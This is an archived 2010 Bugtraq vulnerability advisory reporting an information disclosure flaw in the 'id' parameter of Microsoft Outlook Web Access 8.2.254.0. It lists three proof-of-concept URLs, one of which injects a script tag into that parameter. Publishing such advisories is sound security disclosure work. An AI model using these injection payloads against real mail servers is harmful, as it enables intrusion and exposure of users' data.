|
|
 |
| New User, Welcome! Login |
Microsoft Outlook Web Access (OWA) v8.2.254.0 "id" parameter Information Disclosure Vulnerability
| From: |
praveen_recker sify com |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
Microsoft Outlook Web Access (OWA) v8.2.254.0 "id" parameter Information Disclosure Vulnerability |
| Date: |
Thu - May 20, 2010 02:14 PM |
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
"Microsoft Outlook Web Access (OWA) version 8.2.254.0"
OS: Windows Server 2003
Internet Explorer 7
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
There is an information disclosure vulnerability in "Microsoft Outlook Web Access (OWA) version 8.2.254.0".
The issue is with the id parameter.
Following are different exploitation techniques:
https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script>
https://example.com/owa/?ae=Folder&t=IPF.Note&id=
https://example.com/owa/?ae=Folder&t=IPF.Note&id=A
Whom to contact to get a CVE Identifier for this vulnerability.
Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
